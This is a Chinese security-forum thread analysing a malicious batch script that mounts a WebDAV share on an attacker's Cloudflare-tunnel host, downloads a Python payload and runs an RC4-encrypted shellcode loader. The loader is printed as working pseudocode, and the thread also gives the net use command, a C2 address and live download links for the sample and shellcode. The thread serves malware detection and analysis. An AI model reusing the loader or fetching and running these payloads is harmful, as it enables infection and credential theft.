恶意bat脚本

御坂14857号

https://wwqr.lanzouy.com/ipqhQ2weybkj
https://wormhole.app/z9eaO6#kO5urAEtIwgBAT0Bb1SynQ

关联服务器：hxxps://digital-childrens-junior-cure.trycloudflare.com/

vt首次上传，检出2x（Avast/AVG）：
https://www.virustotal.com/gui/f ... 7320ef7c2?nocache=1
微步判定安全：
https://s.threatbook.com/report/ ... 7e1df204ed7320ef7c2

GDHJDSYDH

EIS扫描miss，沙盒内运行后冰盾拦截数次，多沙箱平台检测出威胁

ft-cai

any.run
要python才能运行？

御坂14857号

ft-cai 发表于 2025-5-16 22:46
any.run
要python才能运行？

这个bat下了一个压缩包（jaka.zip），里面有python环境的，用来运行了一个叫yea.py的文件：
https://wormhole.app/bLQDxP#2YDzuDVtUtEJWbB5Wc2UWg

这个py文件在vt上有6个检出：
https://www.virustotal.com/gui/f ... ac835693b47a7bacfad

Rukia

卡巴
cl.bat-UDS:Trojan.BAT.Alien.gen

lsop1349987

emsisoft拦截网址

吃瓜群众第123位

Avast kill

Fadouse

BDGZ Kill


简易逆向

双击后调用net组件加载远程共享磁盘

1. net  use Z: "\\digital-childrens-junior-cure.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no

复制代码

并下载python环境和恶意载荷 释放至 用户文件夹下的联系人目录中

下载后删除

1. net  use Z: /delete /yes

复制代码

恶意载荷为python编写，为jaka.zip中 yea.py 文件
改文件被混淆


对py文件进行分析发现，这是一段 rc4加密的shellcodeloader
伪代码如下

1. import ctypes, base64
   
2. 
   
3. def rc4_decrypt(key: bytes, data: bytes) -> bytes:
   
4.     # Key-Scheduling Algorithm (KSA)
   
5.     S = list(range(256))
   
6.     j = 0
   
7.     for i in range(256):
   
8.         j = (j + S[i] + key[i % len(key)]) % 256
   
9.         S[i], S[j] = S[j], S[i]
   
10.     # Pseudo-Random Generation Algorithm (PRGA)
    
11.     i = j = 0
    
12.     out = bytearray()
    
13.     for byte in data:
    
14.         i = (i + 1) % 256
    
15.         j = (j + S[i]) % 256
    
16.         S[i], S[j] = S[j], S[i]
    
17.         K = S[(S[i] + S[j]) % 256]
    
18.         out.append(byte ^ K)
    
19.     return bytes(out)
    
20. 
    
21. def load_and_execute():
    
22.     encrypted = base64.b64decode('encoded shellcode') {index=11}
    
23.     key       = b"xWp0LaAO"
    
24.     shellcode = rc4_decrypt(key, encrypted)
    
25. 
    
26.     # Allocate and make memory executable
    
27.     buf = ctypes.create_string_buffer(shellcode)
    
28.     ctypes.windll.kernel32.VirtualProtect(
    
29.         ctypes.byref(buf),
    
30.         ctypes.sizeof(buf),
    
31.         0x40,                # PAGE_EXECUTE_READWRITE
    
32.         ctypes.byref(ctypes.c_ulong())
    
33.     )
    
34. 
    
35.     # Cast to function pointer and call
    
36.     fn = ctypes.cast(buf, ctypes.CFUNCTYPE(ctypes.c_void_p))
    
37.     fn()
    
38. 
    
39. if __name__ == "__main__":
    
40.     load_and_execute()
    

复制代码

提取shellcode后上传vt进行初步分析，发现shellcode是由donut工具将dll/exe文件转换的shellcode
VirusTotal - File - 7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573


使用github 工具解密shellcode得到原始shellcode
并提交vt分析，发现家族有可能是lazy 泄密木马

动态分析
样
样本会创建一个父进程欺骗的notepad.exe，分配内存后执行apc注入
C2 ip: 95.217.129.88:5921



核心载荷下载 https://www.123912.com/s/HmItjv-Tm22?提取码:VeTM
Shellcode二进制文件下载 https://www.123912.com/s/HmItjv-vm22?提取码:dYAH

心醉咖啡

火绒扫描miss

biue

腾讯电脑管家 不报